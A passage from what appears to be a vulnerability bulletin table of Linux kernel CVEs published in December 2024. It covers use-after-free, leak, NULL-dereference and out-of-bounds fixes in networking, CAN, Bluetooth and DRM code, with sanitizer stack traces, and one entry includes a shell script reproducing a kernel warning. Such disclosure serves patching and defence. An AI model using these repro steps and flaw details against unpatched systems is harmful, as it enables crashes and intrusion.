0000000000000006 R14: ffff88804b938130 R15: 0000000000000140 FS: 000055558a3d6500(0000) GS:ffff88806a800000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f1295974ff8 CR3: 000000002ab6e000 CR4: 0000000000352ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <IRQ> skb_over_panic net/core/skbuff.c:211 [inline] skb_put+0x174/0x1b0 net/core/skbuff.c:2617 send_hsr_supervision_frame+0x6fa/0x9e0 net/hsr/hsr_device.c:342 hsr_proxy_announce+0x1a3/0x4a0 net/hsr/hsr_device.c:436 call_timer_fn+0x1a0/0x610 kernel/time/timer.c:1794 expire_timers kernel/time/timer.c:1845 [inline] __run_timers+0x6e8/0x930 kernel/time/timer.c:2419 __run_timer_base kernel/time/timer.c:2430 [inline] __run_timer_base kernel/time/timer.c:2423 [inline] run_timer_base+0x111/0x190 kernel/time/timer.c:2439 run_timer_softirq+0x1a/0x40 kernel/time/timer.c:2449 handle_softirqs+0x213/0x8f0 kernel/softirq.c:554 __do_softirq kernel/softirq.c:588 [inline] invoke_softirq kernel/softirq.c:428 [inline] __irq_exit_rcu kernel/softirq.c:637 [inline] irq_exit_rcu+0xbb/0x120 kernel/softirq.c:649 instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1049 [inline] sysvec_apic_timer_interrupt+0xa4/0xc0 arch/x86/kernel/apic/apic.c:1049 </IRQ> | 2024-12-27 | not yet calculated | CVE-2024-56639 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/smc: fix LGR and link use-after-free issue We encountered a LGR/link use-after-free issue, which manifested as the LGR/link refcnt reaching 0 early and entering the clear process, making resource access unsafe. refcount_t: addition on 0; use-after-free. WARNING: CPU: 14 PID: 107447 at lib/refcount.c:25 refcount_warn_saturate+0x9c/0x140 Workqueue: events smc_lgr_terminate_work [smc] Call trace: refcount_warn_saturate+0x9c/0x140 __smc_lgr_terminate.part.45+0x2a8/0x370 [smc] smc_lgr_terminate_work+0x28/0x30 [smc] process_one_work+0x1b8/0x420 worker_thread+0x158/0x510 kthread+0x114/0x118 or refcount_t: underflow; use-after-free. WARNING: CPU: 6 PID: 93140 at lib/refcount.c:28 refcount_warn_saturate+0xf0/0x140 Workqueue: smc_hs_wq smc_listen_work [smc] Call trace: refcount_warn_saturate+0xf0/0x140 smcr_link_put+0x1cc/0x1d8 [smc] smc_conn_free+0x110/0x1b0 [smc] smc_conn_abort+0x50/0x60 [smc] smc_listen_find_device+0x75c/0x790 [smc] smc_listen_work+0x368/0x8a0 [smc] process_one_work+0x1b8/0x420 worker_thread+0x158/0x510 kthread+0x114/0x118 It is caused by repeated release of LGR/link refcnt. One suspect is that smc_conn_free() is called repeatedly because some smc_conn_free() from server listening path are not protected by sock lock. e.g. Calls under socklock | smc_listen_work ------------------------------------------------------- lock_sock(sk) | smc_conn_abort smc_conn_free | \- smc_conn_free \- smcr_link_put | \- smcr_link_put (duplicated) release_sock(sk) So here add sock lock protection in smc_listen_work() path, making it exclusive with other connection operations. | 2024-12-27 | not yet calculated | CVE-2024-56640 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/smc: initialize close_work early to avoid warning We encountered a warning that close_work was canceled before initialization. WARNING: CPU: 7 PID: 111103 at kernel/workqueue.c:3047 __flush_work+0x19e/0x1b0 Workqueue: events smc_lgr_terminate_work [smc] RIP: 0010:__flush_work+0x19e/0x1b0 Call Trace: ? __wake_up_common+0x7a/0x190 ? work_busy+0x80/0x80 __cancel_work_timer+0xe3/0x160 smc_close_cancel_work+0x1a/0x70 [smc] smc_close_active_abort+0x207/0x360 [smc] __smc_lgr_terminate.part.38+0xc8/0x180 [smc] process_one_work+0x19e/0x340 worker_thread+0x30/0x370 ? process_one_work+0x340/0x340 kthread+0x117/0x130 ? __kthread_cancel_work+0x50/0x50 ret_from_fork+0x22/0x30 This is because when smc_close_cancel_work is triggered, e.g. the RDMA driver is rmmod and the LGR is terminated, the conn->close_work is flushed before initialization, resulting in WARN_ON(!work->func). __smc_lgr_terminate | smc_connect_{rdma|ism} ------------------------------------------------------------- | smc_conn_create | \- smc_lgr_register_conn for conn in lgr->conns_all | \- smc_conn_kill | \- smc_close_active_abort | \- smc_close_cancel_work | \- cancel_work_sync | \- __flush_work | (close_work) | | smc_close_init | \- INIT_WORK(&close_work) So fix this by initializing close_work before establishing the connection. | 2024-12-27 | not yet calculated | CVE-2024-56641 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: tipc: Fix use-after-free of kernel socket in cleanup_bearer(). syzkaller reported a use-after-free of UDP kernel socket in cleanup_bearer() without repro. [0][1] When bearer_disable() calls tipc_udp_disable(), cleanup of the UDP kernel socket is deferred by work calling cleanup_bearer(). tipc_net_stop() waits for such works to finish by checking tipc_net(net)->wq_count. However, the work decrements the count too early before releasing the kernel socket, unblocking cleanup_net() and resulting in use-after-free. Let's move the decrement after releasing the socket in cleanup_bearer(). [0]: ref_tracker: net notrefcnt@000000009b3d1faf has 1/1 users at sk_alloc+0x438/0x608 inet_create+0x4c8/0xcb0 __sock_create+0x350/0x6b8 sock_create_kern+0x58/0x78 udp_sock_create4+0x68/0x398 udp_sock_create+0x88/0xc8 tipc_udp_enable+0x5e8/0x848 __tipc_nl_bearer_enable+0x84c/0xed8 tipc_nl_bearer_enable+0x38/0x60 genl_family_rcv_msg_doit+0x170/0x248 genl_rcv_msg+0x400/0x5b0 netlink_rcv_skb+0x1dc/0x398 genl_rcv+0x44/0x68 netlink_unicast+0x678/0x8b0 netlink_sendmsg+0x5e4/0x898 ____sys_sendmsg+0x500/0x830 [1]: BUG: KMSAN: use-after-free in udp_hashslot include/net/udp.h:85 [inline] BUG: KMSAN: use-after-free in udp_lib_unhash+0x3b8/0x930 net/ipv4/udp.c:1979 udp_hashslot include/net/udp.h:85 [inline] udp_lib_unhash+0x3b8/0x930 net/ipv4/udp.c:1979 sk_common_release+0xaf/0x3f0 net/core/sock.c:3820 inet_release+0x1e0/0x260 net/ipv4/af_inet.c:437 inet6_release+0x6f/0xd0 net/ipv6/af_inet6.c:489 __sock_release net/socket.c:658 [inline] sock_release+0xa0/0x210 net/socket.c:686 cleanup_bearer+0x42d/0x4c0 net/tipc/udp_media.c:819 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0xcaf/0x1c90 kernel/workqueue.c:3310 worker_thread+0xf6c/0x1510 kernel/workqueue.c:3391 kthread+0x531/0x6b0 kernel/kthread.c:389 ret_from_fork+0x60/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:244 Uninit was created at: slab_free_hook mm/slub.c:2269 [inline] slab_free mm/slub.c:4580 [inline] kmem_cache_free+0x207/0xc40 mm/slub.c:4682 net_free net/core/net_namespace.c:454 [inline] cleanup_net+0x16f2/0x19d0 net/core/net_namespace.c:647 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0xcaf/0x1c90 kernel/workqueue.c:3310 worker_thread+0xf6c/0x1510 kernel/workqueue.c:3391 kthread+0x531/0x6b0 kernel/kthread.c:389 ret_from_fork+0x60/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x11/0x20 arch/x86/entry/entry_64.S:244 CPU: 0 UID: 0 PID: 54 Comm: kworker/0:2 Not tainted 6.12.0-rc1-00131-gf66ebf37d69c #7 91723d6f74857f70725e1583cba3cf4adc716cfa Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 Workqueue: events cleanup_bearer | 2024-12-27 | not yet calculated | CVE-2024-56642 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: dccp: Fix memory leak in dccp_feat_change_recv If dccp_feat_push_confirm() fails after new value for SP feature was accepted without reconciliation ('entry == NULL' branch), memory allocated for that value with dccp_feat_clone_sp_val() is never freed. Here is the kmemleak stack for this: unreferenced object 0xffff88801d4ab488 (size 8): comm "syz-executor310", pid 1127, jiffies 4295085598 (age 41.666s) hex dump (first 8 bytes): 01 b4 4a 1d 80 88 ff ff ..J..... backtrace: [<00000000db7cabfe>] kmemdup+0x23/0x50 mm/util.c:128 [<0000000019b38405>] kmemdup include/linux/string.h:465 [inline] [<0000000019b38405>] dccp_feat_clone_sp_val net/dccp/feat.c:371 [inline] [<0000000019b38405>] dccp_feat_clone_sp_val net/dccp/feat.c:367 [inline] [<0000000019b38405>] dccp_feat_change_recv net/dccp/feat.c:1145 [inline] [<0000000019b38405>] dccp_feat_parse_options+0x1196/0x2180 net/dccp/feat.c:1416 [<00000000b1f6d94a>] dccp_parse_options+0xa2a/0x1260 net/dccp/options.c:125 [<0000000030d7b621>] dccp_rcv_state_process+0x197/0x13d0 net/dccp/input.c:650 [<000000001f74c72e>] dccp_v4_do_rcv+0xf9/0x1a0 net/dccp/ipv4.c:688 [<00000000a6c24128>] sk_backlog_rcv include/net/sock.h:1041 [inline] [<00000000a6c24128>] __release_sock+0x139/0x3b0 net/core/sock.c:2570 [<00000000cf1f3a53>] release_sock+0x54/0x1b0 net/core/sock.c:3111 [<000000008422fa23>] inet_wait_for_connect net/ipv4/af_inet.c:603 [inline] [<000000008422fa23>] __inet_stream_connect+0x5d0/0xf70 net/ipv4/af_inet.c:696 [<0000000015b6f64d>] inet_stream_connect+0x53/0xa0 net/ipv4/af_inet.c:735 [<0000000010122488>] __sys_connect_file+0x15c/0x1a0 net/socket.c:1865 [<00000000b4b70023>] __sys_connect+0x165/0x1a0 net/socket.c:1882 [<00000000f4cb3815>] __do_sys_connect net/socket.c:1892 [inline] [<00000000f4cb3815>] __se_sys_connect net/socket.c:1889 [inline] [<00000000f4cb3815>] __x64_sys_connect+0x6e/0xb0 net/socket.c:1889 [<00000000e7b1e839>] do_syscall_64+0x33/0x40 arch/x86/entry/common.c:46 [<0000000055e91434>] entry_SYSCALL_64_after_hwframe+0x67/0xd1 Clean up the allocated memory in case of dccp_feat_push_confirm() failure and bail out with an error reset code. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2024-12-27 | not yet calculated | CVE-2024-56643 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/ipv6: release expired exception dst cached in socket Dst objects get leaked in ip6_negative_advice() when this function is executed for an expired IPv6 route located in the exception table. There are several conditions that must be fulfilled for the leak to occur: * an ICMPv6 packet indicating a change of the MTU for the path is received, resulting in an exception dst being created * a TCP connection that uses the exception dst for routing packets must start timing out so that TCP begins retransmissions * after the exception dst expires, the FIB6 garbage collector must not run before TCP executes ip6_negative_advice() for the expired exception dst When TCP executes ip6_negative_advice() for an exception dst that has expired and if no other socket holds a reference to the exception dst, the refcount of the exception dst is 2, which corresponds to the increment made by dst_init() and the increment made by the TCP socket for which the connection is timing out. The refcount made by the socket is never released. The refcount of the dst is decremented in sk_dst_reset() but that decrement is counteracted by a dst_hold() intentionally placed just before the sk_dst_reset() in ip6_negative_advice(). After ip6_negative_advice() has finished, there is no other object tied to the dst. The socket lost its reference stored in sk_dst_cache and the dst is no longer in the exception table. The exception dst becomes a leaked object. As a result of this dst leak, an unbalanced refcount is reported for the loopback device of a net namespace being destroyed under kernels that do not contain e5f80fcf869a ("ipv6: give an IPv6 dev to blackhole_netdev"): unregister_netdevice: waiting for lo to become free. Usage count = 2 Fix the dst leak by removing the dst_hold() in ip6_negative_advice(). The patch that introduced the dst_hold() in ip6_negative_advice() was 92f1655aa2b22 ("net: fix __dst_negative_advice() race"). But 92f1655aa2b22 merely refactored the code with regards to the dst refcount so the issue was present even before 92f1655aa2b22. The bug was introduced in 54c1a859efd9f ("ipv6: Don't drop cache route entry unless timer actually expired.") where the expired cached route is deleted and the sk_dst_cache member of the socket is set to NULL by calling dst_negative_advice() but the refcount belonging to the socket is left unbalanced. The IPv4 version - ipv4_negative_advice() - is not affected by this bug. When the TCP connection times out ipv4_negative_advice() merely resets the sk_dst_cache of the socket while decrementing the refcount of the exception dst. | 2024-12-27 | not yet calculated | CVE-2024-56644 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: can: j1939: j1939_session_new(): fix skb reference counting Since j1939_session_skb_queue() does an extra skb_get() for each new skb, do the same for the initial one in j1939_session_new() to avoid refcount underflow. [mkl: clean up commit message] | 2024-12-27 | not yet calculated | CVE-2024-56645 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ipv6: avoid possible NULL deref in modify_prefix_route() syzbot found a NULL deref [1] in modify_prefix_route(), caused by one fib6_info without a fib6_table pointer set. This can happen for net->ipv6.fib6_null_entry [1] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000006: 0000 [#1] PREEMPT SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037] CPU: 1 UID: 0 PID: 5837 Comm: syz-executor888 Not tainted 6.12.0-syzkaller-09567-g7eef7e306d3c #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:__lock_acquire+0xe4/0x3c40 kernel/locking/lockdep.c:5089 Code: 08 84 d2 0f 85 15 14 00 00 44 8b 0d ca 98 f5 0e 45 85 c9 0f 84 b4 0e 00 00 48 b8 00 00 00 00 00 fc ff df 4c 89 e2 48 c1 ea 03 <80> 3c 02 00 0f 85 96 2c 00 00 49 8b 04 24 48 3d a0 07 7f 93 0f 84 RSP: 0018:ffffc900035d7268 EFLAGS: 00010006 RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000 RDX: 0000000000000006 RSI: 1ffff920006bae5f RDI: 0000000000000030 RBP: 0000000000000000 R08: 0000000000000001 R09: 0000000000000001 R10: ffffffff90608e17 R11: 0000000000000001 R12: 0000000000000030 R13: ffff888036334880 R14: 0000000000000000 R15: 0000000000000000 FS: 0000555579e90380(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffc59cc4278 CR3: 0000000072b54000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> lock_acquire.part.0+0x11b/0x380 kernel/locking/lockdep.c:5849 __raw_spin_lock_bh include/linux/spinlock_api_smp.h:126 [inline] _raw_spin_lock_bh+0x33/0x40 kernel/locking/spinlock.c:178 spin_lock_bh include/linux/spinlock.h:356 [inline] modify_prefix_route+0x30b/0x8b0 net/ipv6/addrconf.c:4831 inet6_addr_modify net/ipv6/addrconf.c:4923 [inline] inet6_rtm_newaddr+0x12c7/0x1ab0 net/ipv6/addrconf.c:5055 rtnetlink_rcv_msg+0x3c7/0xea0 net/core/rtnetlink.c:6920 netlink_rcv_skb+0x16b/0x440 net/netlink/af_netlink.c:2541 netlink_unicast_kernel net/netlink/af_netlink.c:1321 [inline] netlink_unicast+0x53c/0x7f0 net/netlink/af_netlink.c:1347 netlink_sendmsg+0x8b8/0xd70 net/netlink/af_netlink.c:1891 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg net/socket.c:726 [inline] ____sys_sendmsg+0xaaf/0xc90 net/socket.c:2583 ___sys_sendmsg+0x135/0x1e0 net/socket.c:2637 __sys_sendmsg+0x16e/0x220 net/socket.c:2669 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fd1dcef8b79 Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 c1 17 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffc59cc4378 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fd1dcef8b79 RDX: 0000000000040040 RSI: 0000000020000140 RDI: 0000000000000004 RBP: 00000000000113fd R08: 0000000000000006 R09: 0000000000000006 R10: 0000000000000006 R11: 0000000000000246 R12: 00007ffc59cc438c R13: 431bde82d7b634db R14: 0000000000000001 R15: 0000000000000001 </TASK> | 2024-12-27 | not yet calculated | CVE-2024-56646 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: Fix icmp host relookup triggering ip_rt_bug arp link failure may trigger ip_rt_bug while xfrm enabled, call trace is: WARNING: CPU: 0 PID: 0 at net/ipv4/route.c:1241 ip_rt_bug+0x14/0x20 Modules linked in: CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.0-rc6-00077-g2e1b3cc9d7f7 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 RIP: 0010:ip_rt_bug+0x14/0x20 Call Trace: <IRQ> ip_send_skb+0x14/0x40 __icmp_send+0x42d/0x6a0 ipv4_link_failure+0xe2/0x1d0 arp_error_report+0x3c/0x50 neigh_invalidate+0x8d/0x100 neigh_timer_handler+0x2e1/0x330 call_timer_fn+0x21/0x120 __run_timer_base.part.0+0x1c9/0x270 run_timer_softirq+0x4c/0x80 handle_softirqs+0xac/0x280 irq_exit_rcu+0x62/0x80 sysvec_apic_timer_interrupt+0x77/0x90 The script below reproduces this scenario: ip xfrm policy add src 0.0.0.0/0 dst 0.0.0.0/0 \ dir out priority 0 ptype main flag localok icmp ip l a veth1 type veth ip a a 192.168.141.111/24 dev veth0 ip l s veth0 up ping 192.168.141.155 -c 1 icmp_route_lookup() create input routes for locally generated packets while xfrm relookup ICMP traffic.Then it will set input route (dst->out = ip_rt_bug) to skb for DESTUNREACH. For ICMP err triggered by locally generated packets, dst->dev of output route is loopback. Generally, xfrm relookup verification is not required on loopback interfaces (net.ipv4.conf.lo.disable_xfrm = 1). Skip icmp relookup for locally generated packets to fix it. | 2024-12-27 | not yet calculated | CVE-2024-56647 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: hsr: avoid potential out-of-bound access in fill_frame_info() syzbot is able to feed a packet with 14 bytes, pretending it is a vlan one. Since fill_frame_info() is relying on skb->mac_len already, extend the check to cover this case. BUG: KMSAN: uninit-value in fill_frame_info net/hsr/hsr_forward.c:709 [inline] BUG: KMSAN: uninit-value in hsr_forward_skb+0x9ee/0x3b10 net/hsr/hsr_forward.c:724 fill_frame_info net/hsr/hsr_forward.c:709 [inline] hsr_forward_skb+0x9ee/0x3b10 net/hsr/hsr_forward.c:724 hsr_dev_xmit+0x2f0/0x350 net/hsr/hsr_device.c:235 __netdev_start_xmit include/linux/netdevice.h:5002 [inline] netdev_start_xmit include/linux/netdevice.h:5011 [inline] xmit_one net/core/dev.c:3590 [inline] dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3606 __dev_queue_xmit+0x366a/0x57d0 net/core/dev.c:4434 dev_queue_xmit include/linux/netdevice.h:3168 [inline] packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3146 [inline] packet_sendmsg+0x91ae/0xa6f0 net/packet/af_packet.c:3178 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:726 __sys_sendto+0x594/0x750 net/socket.c:2197 __do_sys_sendto net/socket.c:2204 [inline] __se_sys_sendto net/socket.c:2200 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2200 x64_sys_call+0x346a/0x3c30 arch/x86/include/generated/asm/syscalls_64.h:45 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: slab_post_alloc_hook mm/slub.c:4091 [inline] slab_alloc_node mm/slub.c:4134 [inline] kmem_cache_alloc_node_noprof+0x6bf/0xb80 mm/slub.c:4186 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:587 __alloc_skb+0x363/0x7b0 net/core/skbuff.c:678 alloc_skb include/linux/skbuff.h:1323 [inline] alloc_skb_with_frags+0xc8/0xd00 net/core/skbuff.c:6612 sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2881 packet_alloc_skb net/packet/af_packet.c:2995 [inline] packet_snd net/packet/af_packet.c:3089 [inline] packet_sendmsg+0x74c6/0xa6f0 net/packet/af_packet.c:3178 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg+0x30f/0x380 net/socket.c:726 __sys_sendto+0x594/0x750 net/socket.c:2197 __do_sys_sendto net/socket.c:2204 [inline] __se_sys_sendto net/socket.c:2200 [inline] __x64_sys_sendto+0x125/0x1d0 net/socket.c:2200 x64_sys_call+0x346a/0x3c30 arch/x86/include/generated/asm/syscalls_64.h:45 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-12-27 | not yet calculated | CVE-2024-56648 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: enetc: Do not configure preemptible TCs if SIs do not support Both ENETC PF and VF drivers share enetc_setup_tc_mqprio() to configure MQPRIO. And enetc_setup_tc_mqprio() calls enetc_change_preemptible_tcs() to configure preemptible TCs. However, only PF is able to configure preemptible TCs. Because only PF has related registers, while VF does not have these registers. So for VF, its hw->port pointer is NULL. Therefore, VF will access an invalid pointer when accessing a non-existent register, which will cause a crash issue. The simplified log is as follows. root@ls1028ardb:~# tc qdisc add dev eno0vf0 parent root handle 100: \ mqprio num_tc 4 map 0 0 1 1 2 2 3 3 queues 1@0 1@1 1@2 1@3 hw 1 [ 187.290775] Unable to handle kernel paging request at virtual address 0000000000001f00 [ 187.424831] pc : enetc_mm_commit_preemptible_tcs+0x1c4/0x400 [ 187.430518] lr : enetc_mm_commit_preemptible_tcs+0x30c/0x400 [ 187.511140] Call trace: [ 187.513588] enetc_mm_commit_preemptible_tcs+0x1c4/0x400 [ 187.518918] enetc_setup_tc_mqprio+0x180/0x214 [ 187.523374] enetc_vf_setup_tc+0x1c/0x30 [ 187.527306] mqprio_enable_offload+0x144/0x178 [ 187.531766] mqprio_init+0x3ec/0x668 [ 187.535351] qdisc_create+0x15c/0x488 [ 187.539023] tc_modify_qdisc+0x398/0x73c [ 187.542958] rtnetlink_rcv_msg+0x128/0x378 [ 187.547064] netlink_rcv_skb+0x60/0x130 [ 187.550910] rtnetlink_rcv+0x18/0x24 [ 187.554492] netlink_unicast+0x300/0x36c [ 187.558425] netlink_sendmsg+0x1a8/0x420 [ 187.606759] ---[ end trace 0000000000000000 ]--- In addition, some PFs also do not support configuring preemptible TCs, such as eno1 and eno3 on LS1028A. It won't crash like it does for VFs, but we should prevent these PFs from accessing these unimplemented registers. | 2024-12-27 | not yet calculated | CVE-2024-56649 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netfilter: x_tables: fix LED ID check in led_tg_check() Syzbot has reported the following BUG detected by KASAN: BUG: KASAN: slab-out-of-bounds in strlen+0x58/0x70 Read of size 1 at addr ffff8881022da0c8 by task repro/5879 ... Call Trace: <TASK> dump_stack_lvl+0x241/0x360 ? __pfx_dump_stack_lvl+0x10/0x10 ? __pfx__printk+0x10/0x10 ? _printk+0xd5/0x120 ? __virt_addr_valid+0x183/0x530 ? __virt_addr_valid+0x183/0x530 print_report+0x169/0x550 ? __virt_addr_valid+0x183/0x530 ? __virt_addr_valid+0x183/0x530 ? __virt_addr_valid+0x45f/0x530 ? __phys_addr+0xba/0x170 ? strlen+0x58/0x70 kasan_report+0x143/0x180 ? strlen+0x58/0x70 strlen+0x58/0x70 kstrdup+0x20/0x80 led_tg_check+0x18b/0x3c0 xt_check_target+0x3bb/0xa40 ? __pfx_xt_check_target+0x10/0x10 ? stack_depot_save_flags+0x6e4/0x830 ? nft_target_init+0x174/0xc30 nft_target_init+0x82d/0xc30 ? __pfx_nft_target_init+0x10/0x10 ? nf_tables_newrule+0x1609/0x2980 ? nf_tables_newrule+0x1609/0x2980 ? rcu_is_watching+0x15/0xb0 ? nf_tables_newrule+0x1609/0x2980 ? nf_tables_newrule+0x1609/0x2980 ? __kmalloc_noprof+0x21a/0x400 nf_tables_newrule+0x1860/0x2980 ? __pfx_nf_tables_newrule+0x10/0x10 ? __nla_parse+0x40/0x60 nfnetlink_rcv+0x14e5/0x2ab0 ? __pfx_validate_chain+0x10/0x10 ? __pfx_nfnetlink_rcv+0x10/0x10 ? __lock_acquire+0x1384/0x2050 ? netlink_deliver_tap+0x2e/0x1b0 ? __pfx_lock_release+0x10/0x10 ? netlink_deliver_tap+0x2e/0x1b0 netlink_unicast+0x7f8/0x990 ? __pfx_netlink_unicast+0x10/0x10 ? __virt_addr_valid+0x183/0x530 ? __check_object_size+0x48e/0x900 netlink_sendmsg+0x8e4/0xcb0 ? __pfx_netlink_sendmsg+0x10/0x10 ? aa_sock_msg_perm+0x91/0x160 ? __pfx_netlink_sendmsg+0x10/0x10 __sock_sendmsg+0x223/0x270 ____sys_sendmsg+0x52a/0x7e0 ? __pfx_____sys_sendmsg+0x10/0x10 __sys_sendmsg+0x292/0x380 ? __pfx___sys_sendmsg+0x10/0x10 ? lockdep_hardirqs_on_prepare+0x43d/0x780 ? __pfx_lockdep_hardirqs_on_prepare+0x10/0x10 ? exc_page_fault+0x590/0x8c0 ? do_syscall_64+0xb6/0x230 do_syscall_64+0xf3/0x230 entry_SYSCALL_64_after_hwframe+0x77/0x7f ... </TASK> Since an invalid (without '\0' byte at all) byte sequence may be passed from userspace, add an extra check to ensure that such a sequence is rejected as possible ID and so never passed to 'kstrdup()' and further. | 2024-12-27 | not yet calculated | CVE-2024-56650 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: can: hi311x: hi3110_can_ist(): fix potential use-after-free The commit a22bd630cfff ("can: hi311x: do not report txerr and rxerr during bus-off") removed the reporting of rxerr and txerr even in case of correct operation (i. e. not bus-off). The error count information added to the CAN frame after netif_rx() is a potential use after free, since there is no guarantee that the skb is in the same state. It might be freed or reused. Fix the issue by postponing the netif_rx() call in case of txerr and rxerr reporting. | 2024-12-27 | not yet calculated | CVE-2024-56651 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/xe/reg_sr: Remove register pool That pool implementation doesn't really work: if the krealloc happens to move the memory and return another address, the entries in the xarray become invalid, leading to use-after-free later: BUG: KASAN: slab-use-after-free in xe_reg_sr_apply_mmio+0x570/0x760 [xe] Read of size 4 at addr ffff8881244b2590 by task modprobe/2753 Allocated by task 2753: kasan_save_stack+0x39/0x70 kasan_save_track+0x14/0x40 kasan_save_alloc_info+0x37/0x60 __kasan_kmalloc+0xc3/0xd0 __kmalloc_node_track_caller_noprof+0x200/0x6d0 krealloc_noprof+0x229/0x380 Simplify the code to fix the bug. A better pooling strategy may be added back later if needed. (cherry picked from commit e5283bd4dfecbd3335f43b62a68e24dae23f59e4) | 2024-12-27 | not yet calculated | CVE-2024-56652 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btmtk: avoid UAF in btmtk_process_coredump hci_devcd_append may lead to the release of the skb, so it cannot be accessed once it is called. ================================================================== BUG: KASAN: slab-use-after-free in btmtk_process_coredump+0x2a7/0x2d0 [btmtk] Read of size 4 at addr ffff888033cfabb0 by task kworker/0:3/82 CPU: 0 PID: 82 Comm: kworker/0:3 Tainted: G U 6.6.40-lockdep-03464-g1d8b4eb3060e #1 b0b3c1cc0c842735643fb411799d97921d1f688c Hardware name: Google Yaviks_Ufs/Yaviks_Ufs, BIOS Google_Yaviks_Ufs.15217.552.0 05/07/2024 Workqueue: events btusb_rx_work [btusb] Call Trace: <TASK> dump_stack_lvl+0xfd/0x150 print_report+0x131/0x780 kasan_report+0x177/0x1c0 btmtk_process_coredump+0x2a7/0x2d0 [btmtk 03edd567dd71a65958807c95a65db31d433e1d01] btusb_recv_acl_mtk+0x11c/0x1a0 [btusb 675430d1e87c4f24d0c1f80efe600757a0f32bec] btusb_rx_work+0x9e/0xe0 [btusb 675430d1e87c4f24d0c1f80efe600757a0f32bec] worker_thread+0xe44/0x2cc0 kthread+0x2ff/0x3a0 ret_from_fork+0x51/0x80 ret_from_fork_asm+0x1b/0x30 </TASK> Allocated by task 82: stack_trace_save+0xdc/0x190 kasan_set_track+0x4e/0x80 __kasan_slab_alloc+0x4e/0x60 kmem_cache_alloc+0x19f/0x360 skb_clone+0x132/0xf70 btusb_recv_acl_mtk+0x104/0x1a0 [btusb] btusb_rx_work+0x9e/0xe0 [btusb] worker_thread+0xe44/0x2cc0 kthread+0x2ff/0x3a0 ret_from_fork+0x51/0x80 ret_from_fork_asm+0x1b/0x30 Freed by task 1733: stack_trace_save+0xdc/0x190 kasan_set_track+0x4e/0x80 kasan_save_free_info+0x28/0xb0 ____kasan_slab_free+0xfd/0x170 kmem_cache_free+0x183/0x3f0 hci_devcd_rx+0x91a/0x2060 [bluetooth] worker_thread+0xe44/0x2cc0 kthread+0x2ff/0x3a0 ret_from_fork+0x51/0x80 ret_from_fork_asm+0x1b/0x30 The buggy address belongs to the object at ffff888033cfab40 which belongs to the cache skbuff_head_cache of size 232 The buggy address is located 112 bytes inside of freed 232-byte region [ffff888033cfab40, ffff888033cfac28) The buggy address belongs to the physical page: page:00000000a174ba93 refcount:1 mapcount:0 mapping:0000000000000000 